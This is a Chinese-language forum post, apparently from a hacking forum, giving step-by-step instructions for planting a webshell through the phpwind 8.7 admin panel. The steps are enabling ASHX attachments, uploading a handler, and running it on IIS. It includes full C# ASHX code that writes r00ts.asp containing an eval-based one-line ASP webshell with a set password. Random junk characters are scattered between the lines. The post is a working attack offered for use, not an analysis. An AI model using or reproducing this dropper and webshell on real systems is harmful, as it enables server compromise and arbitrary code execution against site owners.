中国网络渗透测试联盟
标题:
phpwind 8.7 后台拿shell
[打印本页]
作者:
admin
时间:
2013-7-26 12:41
标题:
phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
, p) @7 Y6 E" x, R7 W# `
, Y X) y0 U7 R4 ?' ]0 |( _7 E( N
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
. x$ C# v. u- N& F- P" k# S U
8 M; f5 J6 t3 ]! C
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
]% J4 T0 g; N: ?5 v
5 o& |/ w1 @( e( ]( D, t
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
5 H2 X3 b% p! @& u3 T1 F
, f* F& o4 B7 c2 T% G3 z8 ^3 v
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
5 }' T }' w' V& F
) ^' |8 Y( T! _: z9 | n1 Y9 j4 S
下面是代码:
E( [ J& l# g5 f, p5 `+ b
& G3 [. d5 g: O3 @( L, G9 [
<%@ WebHandler Language="C#"Class="Handler" %>
9 O7 p! a, |4 O: u' R- t
using System;
6 g1 ?; n$ F ~% {! T( s
using System.Web;
- w3 {. p5 k4 j& I: X
using System.IO;
0 g/ C& n2 C9 w' s
public class Handler : IHttpHandler {
: N0 L% B2 x# \% q. {! M- A% o
public void ProcessRequest (HttpContext context) {
: g2 B+ |7 n! Z) C6 }/ w6 u
context.Response.ContentType = "text/plain";
& W$ \+ X# T: j' w$ m4 t& W e
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
% R+ W# y- p, O. g6 [# i
file1.Write("<%eval request(\"r00ts\")%>");
% K* `; C+ u3 u
file1.Flush();
7 E; l. U0 f. e/ U: l! z
file1.Close();
& I2 k# \% ~+ s' l- Q' e2 x* l
}
" X6 b0 B, r0 p8 b( A4 S5 H2 k
public bool IsReusable {
& v3 Y q6 u; m. j$ {. P
get {
. y6 Q9 ^9 \! P( ?
return false;
- }* }7 c v4 m: {4 Y$ n+ i7 R7 b
}
8 R) {3 M; F8 ]7 A5 i) ]
}
2 y5 V# K& h- Y& p1 L# X8 _
}
8 Z# J9 o, \ u5 \; R2 R c4 ]
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2